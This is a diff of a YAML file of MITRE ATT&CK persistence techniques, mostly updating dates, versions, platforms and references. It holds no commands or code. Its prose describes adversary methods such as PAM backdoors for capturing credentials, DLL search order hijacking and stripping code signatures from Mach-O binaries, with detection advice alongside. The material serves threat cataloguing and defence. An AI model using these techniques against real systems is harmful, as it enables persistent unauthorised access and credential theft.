-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -27245,20 +27597,57 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1574.007:
@@ -27348,7 +27737,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.013:
     technique:
@@ -27436,7 +27824,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.013
     atomic_tests: []
   T1543:
@@ -27521,11 +27908,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1133:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:36.318Z'
       name: External Remote Services
       description: |-
         Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -27603,7 +27989,6 @@ persistence:
         url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1133
     atomic_tests: []
   T1546.006:
@@ -27636,7 +28021,7 @@ persistence:
         Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
 
         Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:08:21.101Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: LC_LOAD_DYLIB Addition
       x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -27659,11 +28044,10 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -27721,9 +28105,8 @@ persistence:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1542.001:
@@ -27804,12 +28187,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -27828,7 +28210,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -27842,7 +28223,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -27869,8 +28249,8 @@ persistence:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -27901,7 +28281,8 @@ persistence:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1542.003:
@@ -27958,11 +28339,10 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547:
     technique:
-      modified: '2024-04-16T12:26:07.945Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: Boot or Logon Autostart Execution
       description: |-
         Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -28034,9 +28414,9 @@ persistence:
           2017.
         url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Microsoft TimeProvider
         description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
         url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -28052,12 +28432,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547
     atomic_tests: []
   T1547.014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T14:17:17.353Z'
       name: Active Setup
       description: |-
         Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -28132,7 +28511,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.014
     atomic_tests: []
   T1542.005:
@@ -28175,7 +28553,7 @@ persistence:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
           Information. Retrieved October 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T16:35:53.806Z'
       name: TFTP Boot
       description: |-
         Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -28199,8 +28577,6 @@ persistence:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1543.003:
     technique:
@@ -28355,31 +28731,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.003
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -28396,6 +28752,7 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -28406,9 +28763,13 @@ persistence:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -28416,17 +28777,37 @@ persistence:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests: []
   T1137:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:01:21.255Z'
+      name: Office Application Startup
+      description: |-
+        Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
+
+        A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
       x_mitre_contributors:
       - Nick Carr, Mandiant
       - Microsoft Threat Intelligence Center (MSTIC)
@@ -28434,79 +28815,73 @@ persistence:
       - Praetorian
       - Loic Jaquemet
       - Ricardo Dias
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
+
+        Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
+
+        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.4'
+      x_mitre_data_sources:
+      - 'File: File Creation'
+      - 'Application Log: Application Log Content'
+      - 'Windows Registry: Windows Registry Key Modification'
+      - 'File: File Modification'
+      - 'Module: Module Load'
+      - 'Process: Process Creation'
+      - 'Windows Registry: Windows Registry Key Creation'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
       created: '2017-12-14T16:46:06.044Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1137
         url: https://attack.mitre.org/techniques/T1137
-      - source_name: SensePost Ruler GitHub
-        url: https://github.com/sensepost/ruler
-        description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
-          services. Retrieved February 4, 2019.'
+        external_id: T1137
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
       - source_name: TechNet O365 Outlook Rules
-        url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
         description: Koeller, B.. (2018, February 21). Defending Against Rules and
           Forms Injection. Retrieved November 5, 2019.
+        url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
       - source_name: CrowdStrike Outlook Forms
-        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
         description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
           Movement and Persistence. Retrieved February 5, 2019.
-      - source_name: Outlook Today Home Page
-        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
-        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
-          Retrieved February 5, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
+        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+      - source_name: SensePost Ruler GitHub
+        description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
+          services. Retrieved February 4, 2019.'
+        url: https://github.com/sensepost/ruler
       - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
         description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
           provides blue teams with the ability to detect Ruler usage against Exchange.
           Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Office Application Startup
-      description: |-
-        Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
-
-        A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      x_mitre_detection: |-
-        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
-
-        Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
-
-        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-      x_mitre_version: '1.3'
+        url: https://github.com/sensepost/notruler
+      - source_name: Outlook Today Home Page
+        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+          Retrieved February 5, 2019.
+        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'File: File Creation'
-      - 'Application Log: Application Log Content'
-      - 'Windows Registry: Windows Registry Key Modification'
-      - 'File: File Modification'
-      - 'Module: Module Load'
-      - 'Process: Process Creation'
-      - 'Windows Registry: Windows Registry Key Creation'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1137
     atomic_tests: []
   T1098.003:
     technique:
-      modified: '2024-03-29T18:29:06.873Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Roles'
       description: "An adversary may add additional roles or permissions to an adversary-controlled
         cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -28536,6 +28911,7 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Alex Parsons, Crowdstrike
@@ -28546,6 +28922,7 @@ persistence:
       - Praetorian
       - Alex Soler, AttackIQ
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
         accounts to identify unusual activity in the assignment of roles to those
@@ -28554,13 +28931,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -28602,9 +28979,6 @@ persistence:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.003
     atomic_tests: []
   T1547.012:
@@ -28672,19 +29046,18 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.012
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -28700,8 +29073,8 @@ persistence:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -28715,7 +29088,7 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -28741,6 +29114,10 @@ persistence:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
